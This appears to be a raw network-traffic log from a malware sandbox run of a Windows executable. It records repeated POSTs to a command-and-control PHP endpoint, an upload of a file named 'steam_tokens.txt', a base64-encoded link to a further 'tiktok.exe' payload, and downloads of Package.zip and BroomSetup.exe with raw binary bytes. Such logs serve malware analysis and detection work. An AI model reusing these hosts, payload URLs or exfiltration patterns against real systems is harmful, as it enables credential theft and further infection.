Apr 26, 2024 10:27:33.891733885 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:33.897861958 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:34.273622036 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:34.296899080 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:34.676574945 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:34.689476967 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:35.064717054 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:35.096854925 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:35.481642962 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:35.487687111 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:35.859199047 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:35.865056992 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:36.243738890 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:36.250350952 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:36.619859934 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:36.628283978 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:37.003559113 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:37.010466099 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:37.398797989 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:37.473237991 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="file"------HJDBFBKKJDHJKECBGDAK--
Apr 26, 2024 10:27:37.847271919 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:37.960336924 CEST	204	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG Host: 185.172.128.76 Content-Length: 150547 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:38.761910915 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:38.875932932 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"her7h48r------FCAFIJJJKEGIECAKKEHI--
Apr 26, 2024 10:27:39.249911070 CEST	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 52 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38 Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	176.97.76.106	80	7284	C:\Users\user\Desktop\QPoX60yhZt.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:03.742647886 CEST	185	OUT	GET /1/Package.zip HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 10:27:04.008272886 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 08:11:47 GMT Content-Type: application/zip Content-Length: 3884863 Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT Connection: keep-alive ETag: "66289c8a-3b473f" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec 84 e0 32 28 87 9a 39 6a c5 df 17 d5 9c fd f8 21 c1 24 f7 ea 96 9c 3c 3c 0f 86 c4 8d da 50 23 62 d7 15 4c 6a a1 44 97 76 47 c4 2b b4 7d af 54 82 03 36 74 52 d5 17 62 d9 22 e9 c4 9b 6f 84 66 a5 87 ef 68 3e cd 2a b9 86 e7 ac 89 1a fa c7 99 5a 0f 1d 35 99 28 dd d7 19 f0 5d a4 8f a2 90 d9 1c a7 e0 a5 Data Ascii: PK?XIbunch.dat\]: "TN<wfX $;e)\|u]+UV~fRje@frVJ-#U=TE5Z&z'k%Je[5PB@.Gz[-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O:J%o`f+OW>SINCm6\|wQxkKoD:n4P>M_\|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF\|)@W6Z79d'`_6zr%a7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.\|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>Z5(]
Apr 26, 2024 10:27:04.008312941 CEST	1289	IN	Data Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
Apr 26, 2024 10:27:04.008353949 CEST	1289	IN	Data Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H\|Im8zn2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;,.\|j\[S
Apr 26, 2024 10:27:04.008392096 CEST	1289	IN	Data Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5 Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
Apr 26, 2024 10:27:04.008428097 CEST	1289	IN	Data Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a Data Ascii: ><:X4.`="+P!`p;KE.\|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_\|gYA#8
Apr 26, 2024 10:27:04.008483887 CEST	1289	IN	Data Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43 Data Ascii: 94SI6j<TNmokj>_P7!Wv}!K2@3Cs-<HIo5 Q0V?4v^i2D5v$ip^`RLK$.0 ^wS~W _h:JIEE;/?j8-
Apr 26, 2024 10:27:04.008539915 CEST	1289	IN	Data Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8 Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
Apr 26, 2024 10:27:04.008579016 CEST	1289	IN	Data Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
Apr 26, 2024 10:27:04.008619070 CEST	1289	IN	Data Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb Data Ascii: 2h\T^BTZP{@%{J.B\|n$=6icc6%Zxn1#]\|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
Apr 26, 2024 10:27:04.008657932 CEST	1289	IN	Data Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25 Data Ascii: p_%cBeg3-Ul #B\|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
Apr 26, 2024 10:27:04.274152994 CEST	1289	IN	Data Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be Data Ascii: MomvnhKB~`]2v=zim@M/Fa2\|dov>vk3#qLj[G?&e<kl9SA/vS/DMLaNjF[3);<g2<pUyru{){N8gk{>\|=r2WRBL]+=K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	185.172.128.228	80	7284	C:\Users\user\Desktop\QPoX60yhZt.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:10.993016958 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 10:27:11.233386040 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 08:27:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4a 00 00 00 00 00 00 0c 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@@Boole
Apr 26, 2024 10:27:11.233499050 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
